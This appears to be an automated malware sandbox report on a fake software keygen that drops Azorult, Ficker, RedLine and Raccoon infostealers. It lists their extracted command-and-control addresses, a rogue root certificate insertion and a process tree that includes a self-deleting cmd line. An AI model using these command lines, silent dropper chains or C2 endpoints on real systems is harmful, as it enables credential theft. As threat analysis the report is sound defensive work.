Analysis
-
max time kernel
59s -
max time network
60s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-03-2021 21:38
Static task
static1
Behavioral task
behavioral1
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Ciberlink.power.dvd.8.delux.keygen.exe
Resource
win10v20201028
General
-
Target
Ciberlink.power.dvd.8.delux.keygen.exe
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
fickerstealer
deniedfight.com:80
Extracted
redline
black
blackeyed.top:80
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/2136-195-0x0000000005A30000-0x0000000005B22000-memory.dmp family_redline behavioral1/memory/2136-198-0x0000000006030000-0x0000000006120000-memory.dmp family_redline -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 3856 keygen-pr.exe 3400 keygen-step-1.exe 2128 keygen-step-3.exe 2124 keygen-step-4.exe 200 key.exe 1544 Setup.exe 2340 multitimer.exe 2448 setups.exe 3152 askinstall20.exe 3192 setups.tmp -
Loads dropped DLL 5 IoCs
pid Process 3192 setups.tmp 3192 setups.tmp 3192 setups.tmp 3192 setups.tmp 3192 setups.tmp -
resource yara_rule behavioral1/memory/2136-185-0x0000000000400000-0x0000000001065000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ipinfo.io 82 ipinfo.io 116 ip-api.com 137 api.ipify.org 141 checkip.amazonaws.com -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3876 5116 WerFault.exe 119 -
Kills process with taskkill 2 IoCs
pid Process 6064 taskkill.exe 4220 taskkill.exe -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2480 PING.EXE 5696 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 85 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 80 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3192 setups.tmp 3192 setups.tmp -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 1544 Setup.exe Token: SeCreateTokenPrivilege 3152 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 3152 askinstall20.exe Token: SeLockMemoryPrivilege 3152 askinstall20.exe Token: SeIncreaseQuotaPrivilege 3152 askinstall20.exe Token: SeMachineAccountPrivilege 3152 askinstall20.exe Token: SeTcbPrivilege 3152 askinstall20.exe Token: SeSecurityPrivilege 3152 askinstall20.exe Token: SeTakeOwnershipPrivilege 3152 askinstall20.exe Token: SeLoadDriverPrivilege 3152 askinstall20.exe Token: SeSystemProfilePrivilege 3152 askinstall20.exe Token: SeSystemtimePrivilege 3152 askinstall20.exe Token: SeProfSingleProcessPrivilege 3152 askinstall20.exe Token: SeIncBasePriorityPrivilege 3152 askinstall20.exe Token: SeCreatePagefilePrivilege 3152 askinstall20.exe Token: SeCreatePermanentPrivilege 3152 askinstall20.exe Token: SeBackupPrivilege 3152 askinstall20.exe Token: SeRestorePrivilege 3152 askinstall20.exe Token: SeShutdownPrivilege 3152 askinstall20.exe Token: SeDebugPrivilege 3152 askinstall20.exe Token: SeAuditPrivilege 3152 askinstall20.exe Token: SeSystemEnvironmentPrivilege 3152 askinstall20.exe Token: SeChangeNotifyPrivilege 3152 askinstall20.exe Token: SeRemoteShutdownPrivilege 3152 askinstall20.exe Token: SeUndockPrivilege 3152 askinstall20.exe Token: SeSyncAgentPrivilege 3152 askinstall20.exe Token: SeEnableDelegationPrivilege 3152 askinstall20.exe Token: SeManageVolumePrivilege 3152 askinstall20.exe Token: SeImpersonatePrivilege 3152 askinstall20.exe Token: SeCreateGlobalPrivilege 3152 askinstall20.exe Token: 31 3152 askinstall20.exe Token: 32 3152 askinstall20.exe Token: 33 3152 askinstall20.exe Token: 34 3152 askinstall20.exe Token: 35 3152 askinstall20.exe Token: SeDebugPrivilege 2340 multitimer.exe Token: SeDebugPrivilege 4220 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2448 setups.exe 3192 setups.tmp 4180 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 4056 wrote to memory of 2292 4056 Ciberlink.power.dvd.8.delux.keygen.exe 78 PID 4056 wrote to memory of 2292 4056 Ciberlink.power.dvd.8.delux.keygen.exe 78 PID 4056 wrote to memory of 2292 4056 Ciberlink.power.dvd.8.delux.keygen.exe 78 PID 2292 wrote to memory of 3856 2292 cmd.exe 81 PID 2292 wrote to memory of 3856 2292 cmd.exe 81 PID 2292 wrote to memory of 3856 2292 cmd.exe 81 PID 2292 wrote to memory of 3400 2292 cmd.exe 82 PID 2292 wrote to memory of 3400 2292 cmd.exe 82 PID 2292 wrote to memory of 3400 2292 cmd.exe 82 PID 2292 wrote to memory of 2128 2292 cmd.exe 83 PID 2292 wrote to memory of 2128 2292 cmd.exe 83 PID 2292 wrote to memory of 2128 2292 cmd.exe 83 PID 2292 wrote to memory of 2124 2292 cmd.exe 84 PID 2292 wrote to memory of 2124 2292 cmd.exe 84 PID 2292 wrote to memory of 2124 2292 cmd.exe 84 PID 3856 wrote to memory of 200 3856 keygen-pr.exe 85 PID 3856 wrote to memory of 200 3856 keygen-pr.exe 85 PID 3856 wrote to memory of 200 3856 keygen-pr.exe 85 PID 2124 wrote to memory of 1544 2124 keygen-step-4.exe 86 PID 2124 wrote to memory of 1544 2124 keygen-step-4.exe 86 PID 2128 wrote to memory of 1340 2128 keygen-step-3.exe 87 PID 2128 wrote to memory of 1340 2128 keygen-step-3.exe 87 PID 2128 wrote to memory of 1340 2128 keygen-step-3.exe 87 PID 200 wrote to memory of 936 200 key.exe 88 PID 200 wrote to memory of 936 200 key.exe 88 PID 200 wrote to memory of 936 200 key.exe 88 PID 1340 wrote to memory of 2480 1340 cmd.exe 90 PID 1340 wrote to memory of 2480 1340 cmd.exe 90 PID 1340 wrote to memory of 2480 1340 cmd.exe 90 PID 1544 wrote to memory of 2340 1544 Setup.exe 91 PID 1544 wrote to memory of 2340 1544 Setup.exe 91 PID 1544 wrote to memory of 2448 1544 Setup.exe 92 PID 1544 wrote to memory of 2448 1544 Setup.exe 92 PID 1544 wrote to memory of 2448 1544 Setup.exe 92 PID 2124 wrote to memory of 3152 2124 keygen-step-4.exe 94 PID 2124 wrote to memory of 3152 2124 keygen-step-4.exe 94 PID 2124 wrote to memory of 3152 2124 keygen-step-4.exe 94 PID 2448 wrote to memory of 3192 2448 setups.exe 93 PID 2448 wrote to memory of 3192 2448 setups.exe 93 PID 2448 wrote to memory of 3192 2448 setups.exe 93 PID 3152 wrote to memory of 4112 3152 askinstall20.exe 96 PID 3152 wrote to memory of 4112 3152 askinstall20.exe 96 PID 3152 wrote to memory of 4112 3152 askinstall20.exe 96 PID 4112 wrote to memory of 4220 4112 cmd.exe 99 PID 4112 wrote to memory of 4220 4112 cmd.exe 99 PID 4112 wrote to memory of 4220 4112 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Ciberlink.power.dvd.8.delux.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3400
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe" 1 3.1616622016.605bb1c0ecc8f 1016⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5IOYU2KKM6\multitimer.exe" 2 3.1616622016.605bb1c0ecc8f7⤵PID:4804
-
C:\Users\Admin\AppData\Local\Temp\bqnl5fzohu0\gxxi5p2abi5.exe"C:\Users\Admin\AppData\Local\Temp\bqnl5fzohu0\gxxi5p2abi5.exe" /VERYSILENT8⤵PID:4456
-
C:\Users\Admin\AppData\Local\Temp\is-I9DS5.tmp\gxxi5p2abi5.tmp"C:\Users\Admin\AppData\Local\Temp\is-I9DS5.tmp\gxxi5p2abi5.tmp" /SL5="$40290,2592217,780800,C:\Users\Admin\AppData\Local\Temp\bqnl5fzohu0\gxxi5p2abi5.exe" /VERYSILENT9⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\is-RKLLB.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-RKLLB.tmp\winlthsth.exe"10⤵PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 49611⤵
- Program crash
PID:3876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rxuqadk3j3q\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\rxuqadk3j3q\AwesomePoolU1.exe"8⤵PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\pa0o5nfrhkk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pa0o5nfrhkk\Setup3310.exe" /Verysilent /subid=5778⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\is-MR25S.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-MR25S.tmp\Setup3310.tmp" /SL5="$202CC,138429,56832,C:\Users\Admin\AppData\Local\Temp\pa0o5nfrhkk\Setup3310.exe" /Verysilent /subid=5779⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\is-9SCQT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9SCQT.tmp\Setup.exe" /Verysilent10⤵PID:4732
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"11⤵PID:4724
-
